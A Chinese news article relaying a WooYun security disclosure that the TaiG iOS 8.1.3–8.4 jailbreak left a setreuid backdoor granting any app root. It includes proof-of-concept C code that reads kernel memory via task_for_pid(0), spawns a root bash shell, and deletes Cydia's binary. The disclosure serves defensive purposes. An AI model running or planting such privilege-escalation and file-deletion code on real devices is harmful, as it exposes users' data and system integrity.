iOS 8.4完美越獄太極有重大安全后門

蘋(píng)果iOS 8的完美越獄幾乎都是由國(guó)內(nèi)團(tuán)隊(duì)完成的，很多網(wǎng)友都覺(jué)得很驕傲，但是現(xiàn)在卻曝出了很嚴(yán)重的問(wèn)題。

國(guó)內(nèi)著名的烏云漏洞報(bào)告平臺(tái)剛剛通過(guò)官方微博表示，太極越獄（iOS 8.1.3-8.4完美越獄工具）在越獄過(guò)程中修改了系統(tǒng)關(guān)鍵API，導(dǎo)致任意APP都可以獲取到iPhone最高權(quán)限，對(duì)系統(tǒng)穩(wěn)定性以及數(shù)據(jù)隱私安全性造成影響。

具體來(lái)說(shuō)，太極越獄修改了setreuid這個(gè)關(guān)鍵系統(tǒng)API，導(dǎo)致任意APP都可以直接調(diào)用setreuid(0,0)獲得Root執(zhí)行權(quán)限，從而可以修改任意系統(tǒng)文件、也可以task_for_pid打開(kāi)系統(tǒng)內(nèi)核句柄從而完全控制系統(tǒng)底層。

舉例來(lái)說(shuō)，通過(guò)寫(xiě)入系統(tǒng)目錄“/Library/LaunchDaemons”可以注冊(cè)系統(tǒng)服務(wù)，從而植入木馬、病毒、盜號(hào)工具威脅用戶隱私數(shù)據(jù)和密碼。

感興趣的用戶可以到烏云網(wǎng)站上查看這個(gè)報(bào)告的詳情。

太極越獄安全后門烏云平臺(tái)報(bào)告：

背景

太極越獄iOS8.1.3-8.4含有重大安全后門，越獄后導(dǎo)致任意APP可以提權(quán)到Root，從而影響用戶數(shù)據(jù)的安全。舉例來(lái)說(shuō)獲取Root權(quán)限后可以完全控制系統(tǒng)文件，甚至進(jìn)一步安裝木馬等嚴(yán)重威脅用戶安全的惡意軟件。

細(xì)節(jié)

具體分析結(jié)果顯示太極越獄修改了setreuid這個(gè)關(guān)鍵系統(tǒng)API，導(dǎo)致任意APP都可以直接調(diào)用setreuid(0,0)獲得Root執(zhí)行權(quán)限，從而可以修改任意系統(tǒng)文件、也可以task_for_pid打開(kāi)系統(tǒng)內(nèi)核句柄從而完全控制系統(tǒng)底層。例如通過(guò)寫(xiě)入系統(tǒng)目錄“/Library/LaunchDaemons”可以注冊(cè)系統(tǒng)服務(wù)，從而植入木馬、病毒、盜號(hào)工具威脅用戶隱私數(shù)據(jù)和密碼。

漏洞重現(xiàn)演示如下圖：

示例一：通過(guò)test_taig_backdoor1程序讀取內(nèi)核內(nèi)存

示例二：通過(guò)test_taig_backdoor2獲得root權(quán)限shell

test_taig_backdoor讀取任意內(nèi)核poc代碼：

#!c
#include <Foundation/Foundation.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/param.h>
#include <spawn.h>
#include <mach/mach.h>

void dump_kernel_memory(vm_address_t addr)
{
   kern_return_t kret;
   mach_port_t proc_task = 0;
   vm_size_t ret_size = 0;
   vm_size_t i;
   char buffer[128] = {0};
   int ret;

   ret = task_for_pid(mach_task_self(), 0, &proc_task);
   if (ret != 0)
   {
       NSLog(@"[err] get tfp0 fail: %d", ret);
       return;
   }

   NSLog(@"task for pid 0 = %u", proc_task);

       kret = vm_read_overwrite(proc_task,
                               addr,
                               sizeof(buffer),
                                 (vm_address_t)buffer,
                                  &ret_size);

   char *info = malloc(4096);
   info[0] = '\0';

   for (i = 0; i < ret_size; i++)
   {
       if (i % 16 == 0) sprintf(info + strlen(info), "\n%p: ", (void *)(addr + i));
       sprintf(info + strlen(info), "0x%02x ", *(uint8_t*)(buffer + i));
   }
   NSLog(@"%s", info);

   free(info);
}

int main (int argc, const char * argv[])
{
   if (argc != 2)
   {
       NSLog(@"%s [kernel_address]", argv[0]);
       return 0;
   }

   NSLog(@"current uid=%d euid=%d", getuid(), geteuid());

   /*
   * taig backdoor test
   */

   setreuid(0,0);

   NSLog(@"now uid=%d euid=%d", getuid(), geteuid());

   vm_address_t addr = strtoul(argv[1], NULL, 16);
   dump_kernel_memory(addr);

   return 0;
}

test_taig_backdoor2提權(quán)poc代碼：

#!c
void get_root_shell
{
   setreuid(0,0);
   system("/bin/bash -i");
}

在APP中添加下面的代碼進(jìn)行刪除文件測(cè)試（謹(jǐn)慎執(zhí)行）：

#!c
void testBackdoor()
{
NSLog(@"當(dāng)前運(yùn)行進(jìn)程 uid=%d euid=%d", getuid(), geteuid());
setreuid(0,0);
NSLog(@"后門提權(quán)后，當(dāng)前運(yùn)行進(jìn)程 uid=%d euid=%d", getuid(), geteuid());

NSLog(@"刪除任意文件演示（該測(cè)試會(huì)導(dǎo)致Cydia無(wú)法運(yùn)行，請(qǐng)謹(jǐn)慎執(zhí)行）");
unlink("/Applications/Cydia.app/MobileCydia");
}

太極越獄iOS8.0-8.1.1未能找到機(jī)器進(jìn)行測(cè)試，可能也有此重大后門。

總結(jié)

越獄軟件中藏有安全后門并非沒(méi)有先例。早在針對(duì)iOS 7的完美越獄工具evasi0n7中，越獄開(kāi)發(fā)者evad3rs就修改了第0號(hào)系統(tǒng)調(diào)用，導(dǎo)致任意app可以輕易獲得內(nèi)核代碼執(zhí)行的能力。這一做法也引起越獄大神winocm的強(qiáng)烈不滿(http://winocm.moe/projects/research/2014/01/11/evading-ios-security/)。早在2014年Winocm在博文中就已經(jīng)質(zhì)疑太極是否在利用這個(gè)后門。

太極越獄與evad3rs的“緋聞”一直沒(méi)有間斷。據(jù)福布斯報(bào)道（http://www.forbes.com/sites/thomasbrewster/2015/06/26/china-iphone-jailbreak-industry/）（http://mobile.163.com/15/0630/10/ATBNV93H0011671M.html）, 太極曾支付evad3rs高達(dá)一百萬(wàn)美金用于越獄合作開(kāi)發(fā)，該合作的產(chǎn)物就是evasi0n7強(qiáng)制安裝“太極助手”的鬧劇。至于太極越獄的安全后門是“慣犯”還是“初犯”的謎底恐怕就無(wú)法揭開(kāi)了。